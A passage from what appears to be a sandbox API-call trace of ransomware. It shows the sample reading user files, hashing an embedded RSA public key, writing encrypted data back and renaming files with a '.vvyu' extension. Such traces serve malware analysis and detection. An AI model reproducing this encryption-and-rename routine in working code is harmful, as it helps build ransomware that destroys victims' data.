lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a00 | out: hHeap=0x6a0000) returned 1 [0189.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399e8 | out: hHeap=0x6a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39378 | out: hHeap=0x6a0000) returned 1 [0189.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.716] WriteFile (in: hFile=0x584, lpBuffer=0x751d68*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x751d68*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.716] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.716] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.718] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.718] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.718] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.718] CloseHandle (hObject=0x584) returned 1 [0189.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0189.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x751d68 | out: hHeap=0x6a0000) returned 1 [0189.720] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Gallery.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live gallery.url.vvyu")) returned 1 [0189.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.721] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.724] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee70990, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0189.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0189.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8e) returned 0x794008 [0189.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0189.725] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url") returned=".url" [0189.725] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.731] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.731] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.734] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.734] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.735] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.736] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.736] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.736] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.736] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.737] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.737] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.737] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.737] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.737] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.737] GetLastError () returned 0x0 [0189.737] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.737] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.738] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.738] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.738] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0189.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0189.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x751d68 [0189.738] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d39378 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d399e8 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d393c0 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a00 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a48 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0189.739] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bb48 [0189.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0189.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0189.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a48 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39a30 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0189.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0189.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0189.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0189.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a48 | out: hHeap=0x6a0000) returned 1 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a90 | out: hHeap=0x6a0000) returned 1 [0189.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0189.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.742] GetCurrentThreadId () returned 0x264 [0189.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43f70 [0189.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0189.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.743] GetCurrentThreadId () returned 0x264 [0189.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a90 [0189.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a30 [0189.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a48 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a18 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39aa8 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a78 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39a60 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39ac0 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a60 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a60 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a78 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0189.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39a30 | out: hHeap=0x6a0000) returned 1 [0189.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39a30 [0189.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 